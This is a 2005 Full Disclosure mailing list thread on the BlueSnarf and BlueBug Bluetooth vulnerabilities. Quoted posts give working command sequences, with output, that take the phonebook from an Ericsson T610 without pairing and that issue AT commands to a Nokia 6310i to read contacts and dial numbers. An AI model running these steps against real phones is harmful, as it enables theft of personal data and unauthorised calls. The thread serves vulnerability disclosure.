Full Disclosure mailing list archives
Re: Re: Bluetooth: BlueSnarf and BlueBug Full Disclusore
From: Scott Renna <srenna () vdbmusic com>
Date: Sun, 09 Jan 2005 19:04:49 -0500
When I saw Adam's announcement a while back on these issues, I wrote a paper up for SANS. Describes running the attack on FreeBSD based system against a T610. Check out:
http://www.giac.org/practical/GCIA/Scott_Renna_GCIA.pdf Eric Detoisien wrote:
An easy way to get phonebook on Ericsson T610 via bluetooth without pairing : tough:~# hcitool scan Scanning ... 00:0A:D9:XX:XX:XX T610 tough:~# sdptool browse 00:0A:D9:XX:XX:XX Browsing 00:0A:D9:XX:XX:XX ... [...] Service Name: OBEX Object Push Service RecHandle: 0x10005 Service Class ID List: "OBEX Object Push" (0x1105) Protocol Descriptor List: "L2CAP" (0x0100) "RFCOMM" (0x0003) Channel: 10 -----------------------> only RFCOMM channels 10 and 15 are open "OBEX" (0x0008) Profile Descriptor List: "OBEX Object Push" (0x1105) Version: 0x0100 [...] Service Name: OBEX Basic Imaging Service RecHandle: 0x1000b Service Class ID List: "" (0x111b) Protocol Descriptor List: "L2CAP" (0x0100) "RFCOMM" (0x0003) Channel: 15 "OBEX" (0x0008) Profile Descriptor List: "" (0x111a) Version: 0x0100 [...]tough:~# obexftp -b 00:0A:D9:XX:XX:XX -B 10 -g telecom/pb.vcf Browsing 00:0A:D9:FA:03:B7 ...Channel: 7 No custom transport Connecting...bt: 1 done Receiving telecom/pb.vcf.../done Disconnecting...done Eric DetoisienThe Bluebug, as described on [1] is trivially exploitable on some non-Symbian Nokia phones. It allows attacker to create serial profile connection without pairing or asking for permission, therefore it gives unauthorized access to all AT commands. It is possible to read/delete/send SMS messages, add/view/delete phonebook entries, change call diverts, initiate voice or data call. Demonstration on Nokia 6310i: laptop:~# hcitool scan Scanning ... 00:60:57:38:8C:D8 Nokia 6310i laptop:~# rfcomm bind /dev/rfcomm0 00:60:57:38:8C:D8 17 Now you can use plain AT commands, as described in manual [2] or Gnokii [3], for example: laptop:~# cu -l rfcomm0 -s 9600 Connected. [ATE1] OK ATI Nokia OK AT+CPBS? +CPBS: "SM",0,100 OK AT+CPBR=? +CPBR: (1-100),48,18 OK ATDT+48609xxxxxx OK As you can see, the bug is really trivial and looks rather like backdoor. [1] - http://www.thebunker.net/security/bluetooth.htm [2] - http://ncsp.forum.nokia.com/download/?asset_id=11579;ref=devx [3] - http://www.gnokii.org/_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Re: Bluetooth: BlueSnarf and BlueBug Full Disclusore Eric Detoisien (Jan 09)
- Re: Re: Bluetooth: BlueSnarf and BlueBug Full Disclusore Scott Renna (Jan 09)